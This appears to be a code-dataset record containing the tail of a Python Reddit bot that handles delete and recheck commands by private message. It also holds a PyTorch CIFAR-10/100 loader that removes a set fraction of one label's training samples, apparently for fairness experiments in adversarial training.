    y = match_control[ExtraFlags]
    if b == 0:
        logger.info('Skip: no match: {}'.format(submission.permalink))
        return
    logger.info('Process submission: {}'.format(submission.permalink))
    # NOTE(review): submission.author may be None for deleted accounts;
    # the .name access below would then raise — confirm upstream filters.
    message_kwargs = {
        'topic_flags': b,
        'signature': 1,
        'pester': True,
        'passed': False,
        'some': bool(y & ExtraFlags.contains_code_block),
        'thing_kind': type(submission).__name__,
        'redditor': submission.author.name,
        'old_reddit_permalink': 'https://old.reddit.com' + submission.permalink,
        'new_reddit_permalink': 'https://new.reddit.com' + submission.permalink
    }
    message = get_message(**message_kwargs)
    reply = submission.reply(message)
    # Second pass: re-render the message now that the reply id exists
    # (signature=2 variant embeds it) and edit the posted comment.
    message_kwargs.update({
        'signature': 2,
        'bot_name': me.name,
        'reply_id': reply.id
    })
    message = get_message(**message_kwargs)
    reply.edit(message)
    db_services.record_submission_reply(submission, reply, b, y)
def process_inbox_item(item):
    """Handle one inbox item carrying a bot command in its subject line.

    Supported commands:
      * ``!delete [t1_]<id>`` — delete one of the bot's comments.  Trustees
        may force-delete unconditionally; the original submitter may delete
        only their own entry when the comment has no replies and is still
        marked deletable in the database.
      * ``!recheck [t3_]<id>`` — re-run submission processing; trustees only.

    Comment replies, items older than ``ignore_inbox_items_older_than``
    seconds, and non-matching subjects are skipped.  Matching items are
    marked read before being acted on.
    """
    # BUGFIX: this opening log used to claim "deletion request" before the
    # subject was matched, mislabelling recheck and non-command items.
    logger.info('[Inbox] Process: inbox item (from /u/{}): t4_{}'.format(item.author.name, item.id))
    if item.was_comment:
        # Commands arrive as private messages only; ignore comment replies.
        logger.info('[Inbox] Skip: ignore non-message item: t1_{}'.format(item.id))
        return
    if time.time() - item.created_utc > ignore_inbox_items_older_than:
        logger.info('[Inbox] Skip: {0} is older than {1} seconds'.format(type(item).__name__, ignore_inbox_items_older_than))
        return
    delete_match = delete_regexp.match(item.subject)
    recheck_match = recheck_regexp.match(item.subject)
    if not (delete_match or recheck_match):
        logger.info('[Inbox] Skip: no match (subject line): t4_{}'.format(item.id))
        return
    item.mark_read()
    if delete_match:
        thing_kind = delete_match.group(1)   # optional "t1" prefix
        comment_id = delete_match.group(2)
        logger.info('[Inbox] Info: deletion request (from /u/{}): "t1_{}"'.format(item.author.name, comment_id))
        if thing_kind is not None:
            if thing_kind != 't1':
                logger.info(f"[Inbox] Skip: not the kind we're looking for: {thing_kind}_{comment_id}")
                return
        target_id = db_services.get_target_id(comment_id)
        if target_id is None:
            # Not fatal here: trustees may still force-delete an untracked comment.
            logger.warning('[Inbox] Warning: could not resolve target_id "{}" from comment: t1_{}'.format(target_id, comment_id))
        comment = reddit.comment(comment_id)
        try:
            comment.refresh()
        except praw.exceptions.PRAWException:
            logger.info('[Inbox] Skip: not found: t1_{}'.format(comment_id))
            return
        by_authority = item.author.name.lower() in trustees
        if by_authority:
            # Trustees bypass the ownership / reply / deletable checks.
            comment.delete()
            if target_id is not None:
                db_services.assign_is_set_0(target_id)
            logger.info('[Inbox] Success: force delete: {}-{}'.format(target_id, comment_id))
            return
        if target_id is None:
            logger.warning('[Inbox] Skip: cannot resolve author_name from null target_id: {}-{}'.format(target_id, comment_id))
            return
        author_name = db_services.get_author_name(target_id)
        if author_name is None:
            logger.warning('[Inbox] Skip: could not resolve author_name from target_id: {}-{}'.format(target_id, comment_id))
            return
        if comment.author != me:
            logger.info('[Inbox] Skip: not owned: {}-{}'.format(target_id, comment_id))
            return
        by_submitter = item.author.name.lower() == author_name.lower()
        if not by_submitter:
            logger.info('[Inbox] Skip: delete not permitted: {}-{}'.format(target_id, comment_id))
            return
        if len(comment.replies):
            logger.info('[Inbox] Skip: has replies: {}-{}'.format(target_id, comment_id))
            return
        if not db_services.is_deletable(comment_id):
            logger.info('[Inbox] Skip: not deletable: {}-{}'.format(target_id, comment_id))
            return
        comment.delete()
        db_services.assign_is_set_0(target_id)
        db_services.assign_is_ignored_1(target_id)
        logger.info('[Inbox] Success: deleted: {}-{}'.format(target_id, comment_id))
    elif recheck_match:
        logger.info('[Inbox] Process: inbox item, recheck request (from /u/{}): t4_{}'.format(item.author.name, item.id))
        by_authority = item.author.name.lower() in trustees
        if not by_authority:
            logger.info('[Inbox] Skip: unauthorised: t4_{}'.format(item.id))
            return
        thing_kind = recheck_match.group(1)   # optional "t1".."t6" prefix
        thing_id = recheck_match.group(2)
        if thing_kind is None:
            # BUGFIX: this message was missing its f-prefix and logged the
            # literal "{thing_kind}_{thing_id}" placeholders.
            logger.info(f'[Inbox] Skip: thing_kind was not specified: {thing_kind}_{thing_id}')
            return
        if thing_kind != 't3':
            logger.info(f"[Inbox] Skip: not the kind we're looking for: {thing_kind}_{thing_id}")
            return
        submission = reddit.submission(thing_id)
        try:
            submission._fetch()
        except prawcore.exceptions.NotFound:
            logger.warning('Skip: submission ID not found: t3_{}'.format(thing_id))
            db_services.assign_is_set_0(thing_id)
            return
        process_subsmission(submission)
| 30.97619
| 120
| 0.725749
|
4a07e87c0d7748807e21b23b77e5c528c9d2598f
| 7,839
|
py
|
Python
|
dataset/cifar10_rmlabel.py
|
blackcow/Fair-AT
|
62fc269fedd4b63c4b48ae390d494b3832e65fa8
|
[
"Apache-2.0"
] | null | null | null |
dataset/cifar10_rmlabel.py
|
blackcow/Fair-AT
|
62fc269fedd4b63c4b48ae390d494b3832e65fa8
|
[
"Apache-2.0"
] | null | null | null |
dataset/cifar10_rmlabel.py
|
blackcow/Fair-AT
|
62fc269fedd4b63c4b48ae390d494b3832e65fa8
|
[
"Apache-2.0"
] | null | null | null |
"""
对 training load data 改写
按比例删除某 label 下的数据
"""
from __future__ import print_function
from PIL import Image
import os
import os.path
import numpy as np
import sys
if sys.version_info[0] == 2:
import cPickle as pickle
else:
import pickle
import torch.utils.data as data
from torchvision.datasets.utils import download_url, check_integrity
# My import
import argparse
class CIFAR10RM(data.Dataset):
    """`CIFAR10 <https://www.cs.toronto.edu/~kriz/cifar.html>`_ Dataset
    with a configurable fraction of one label's samples removed.

    After loading, samples are sorted by label so that each of the 10
    labels occupies a contiguous run of 5000 samples; the first
    ``args.percent`` fraction of the run belonging to ``args.rmlabel``
    is then deleted from both the images and the targets.

    Args:
        root (string): Root directory of dataset where directory
            ``cifar-10-batches-py`` exists or will be saved to if download
            is set to True.
        args: Namespace with at least ``rmlabel`` (int, index of the label
            to trim) and ``percent`` (float in [0, 1], fraction to remove).
        train (bool, optional): If True, creates dataset from training set,
            otherwise creates from test set.
        transform (callable, optional): A function/transform that takes in an PIL image
            and returns a transformed version. E.g, ``transforms.RandomCrop``
        target_transform (callable, optional): A function/transform that takes in the
            target and transforms it.
        download (bool, optional): If true, downloads the dataset from the internet and
            puts it in root directory. If dataset is already downloaded, it is not
            downloaded again.
    """
    base_folder = 'cifar-10-batches-py'
    url = "https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz"
    filename = "cifar-10-python.tar.gz"
    tgz_md5 = 'c58f30108f718f92721af3b95e74349a'
    train_list = [
        ['data_batch_1', 'c99cafc152244af753f735de768cd75f'],
        ['data_batch_2', 'd4bba439e000b95fd0a9bffe97cbabec'],
        ['data_batch_3', '54ebc095f3ab1f0389bbae665268c751'],
        ['data_batch_4', '634d18415352ddfa80567beed471001a'],
        ['data_batch_5', '482c414d41f54cd18b22e5b47cb7c3cb'],
    ]
    test_list = [
        ['test_batch', '40351d587109b95175f43aff81a1287e'],
    ]
    meta = {
        'filename': 'batches.meta',
        'key': 'label_names',
        'md5': '5ff9c542aee3614f3951f8cda6e48888',
    }

    def __init__(self, root, args, train=True,
                 transform=None, target_transform=None,
                 download=False):
        self.root = os.path.expanduser(root)
        self.transform = transform
        self.target_transform = target_transform
        self.train = train  # training set or test set
        self.args = args
        if download:
            self.download()
        if not self._check_integrity():
            raise RuntimeError('Dataset not found or corrupted.' +
                               ' You can use download=True to download it')
        if self.train:
            downloaded_list = self.train_list
        else:
            downloaded_list = self.test_list
        self.data = []
        self.targets = []
        # now load the picked numpy arrays
        for file_name, checksum in downloaded_list:
            file_path = os.path.join(self.root, self.base_folder, file_name)
            with open(file_path, 'rb') as f:
                if sys.version_info[0] == 2:
                    entry = pickle.load(f)
                else:
                    entry = pickle.load(f, encoding='latin1')
                self.data.append(entry['data'])
                if 'labels' in entry:
                    self.targets.extend(entry['labels'])
                else:
                    self.targets.extend(entry['fine_labels'])
        self.data = np.vstack(self.data).reshape(-1, 3, 32, 32)
        self.data = self.data.transpose((0, 2, 3, 1))  # convert to HWC
        # Sort samples by label (0-9) so each label is a contiguous run.
        sorted_nums = sorted(enumerate(self.targets), key=lambda x: x[1])
        idx = [i[0] for i in sorted_nums]
        self.targets = [i[1] for i in sorted_nums]
        # Reorder the image array (ndarray) to match the sorted targets.
        self.data = self.data[idx]
        # Index range to delete: each label owns a block of 5000 samples.
        # NOTE(review): these offsets assume the training split (5000 per
        # label); with train=False the test split has 1000 per label and the
        # offsets overshoot — confirm this class is only used with train=True.
        label_idx = self.args.rmlabel
        percent = self.args.percent
        start = label_idx * 5000
        end = int(start + 5000*percent)
        print('start:', start)
        print('end:', end)
        rm = np.arange(start, end, 1)
        # Remove the selected rows from both the images and the targets.
        self.data = np.delete(self.data, rm, axis=0)
        del self.targets[start:end]
        self._load_meta()

    def _load_meta(self):
        """Load class names from the batches meta file and build the
        class-name -> index mapping."""
        path = os.path.join(self.root, self.base_folder, self.meta['filename'])
        if not check_integrity(path, self.meta['md5']):
            raise RuntimeError('Dataset metadata file not found or corrupted.' +
                               ' You can use download=True to download it')
        with open(path, 'rb') as infile:
            if sys.version_info[0] == 2:
                data = pickle.load(infile)
            else:
                data = pickle.load(infile, encoding='latin1')
            self.classes = data[self.meta['key']]
        self.class_to_idx = {_class: i for i, _class in enumerate(self.classes)}

    def __getitem__(self, index):
        """
        Args:
            index (int): Index

        Returns:
            tuple: (image, target) where target is index of the target class.
        """
        img, target = self.data[index], self.targets[index]
        # doing this so that it is consistent with all other datasets
        # to return a PIL Image
        img = Image.fromarray(img)
        if self.transform is not None:
            img = self.transform(img)
        if self.target_transform is not None:
            target = self.target_transform(target)
        return img, target

    def __len__(self):
        # Number of samples remaining after label removal.
        return len(self.data)

    def _check_integrity(self):
        """Return True if every train/test batch file exists with the
        expected md5 checksum."""
        root = self.root
        for fentry in (self.train_list + self.test_list):
            filename, md5 = fentry[0], fentry[1]
            fpath = os.path.join(root, self.base_folder, filename)
            if not check_integrity(fpath, md5):
                return False
        return True

    def download(self):
        """Download and extract the archive unless it is already present
        and verified."""
        import tarfile
        if self._check_integrity():
            print('Files already downloaded and verified')
            return
        download_url(self.url, self.root, self.filename, self.tgz_md5)
        # extract file
        # SECURITY NOTE(review): extractall() on an archive without a member
        # filter is vulnerable to path traversal for untrusted archives; the
        # md5 check above mitigates this for the official CIFAR tarball.
        with tarfile.open(os.path.join(self.root, self.filename), "r:gz") as tar:
            tar.extractall(path=self.root)

    def __repr__(self):
        fmt_str = 'Dataset ' + self.__class__.__name__ + '\n'
        fmt_str += '    Number of datapoints: {}\n'.format(self.__len__())
        tmp = 'train' if self.train is True else 'test'
        fmt_str += '    Split: {}\n'.format(tmp)
        fmt_str += '    Root Location: {}\n'.format(self.root)
        tmp = '    Transforms (if any): '
        fmt_str += '{0}{1}\n'.format(tmp, self.transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
        tmp = '    Target Transforms (if any): '
        fmt_str += '{0}{1}'.format(tmp, self.target_transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
        return fmt_str
class CIFAR100RM(CIFAR10RM):
    """`CIFAR100 <https://www.cs.toronto.edu/~kriz/cifar.html>`_ Dataset.

    This is a subclass of the `CIFAR10` Dataset.
    """
    # Only the download/verification metadata is overridden; all loading
    # and label-removal logic is inherited from CIFAR10RM.
    # NOTE(review): the inherited removal logic assumes 5000 samples per
    # label, but CIFAR-100 has 500 per label in the training split — the
    # computed removal offsets will not line up; confirm intended behavior.
    base_folder = 'cifar-100-python'
    url = "https://www.cs.toronto.edu/~kriz/cifar-100-python.tar.gz"
    filename = "cifar-100-python.tar.gz"
    tgz_md5 = 'eb9058c3a382ffc7106e4002c42a8d85'
    train_list = [
        ['train', '16019d7e3df5f24257cddd939b257f8d'],
    ]
    test_list = [
        ['test', 'f0ef6b0ae62326f3e7ffdfab6717acfc'],
    ]
    meta = {
        'filename': 'meta',
        'key': 'fine_label_names',
        'md5': '7973b15100ade9c7d40fb424638fde48',
    }
| 34.685841
| 110
| 0.589871
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.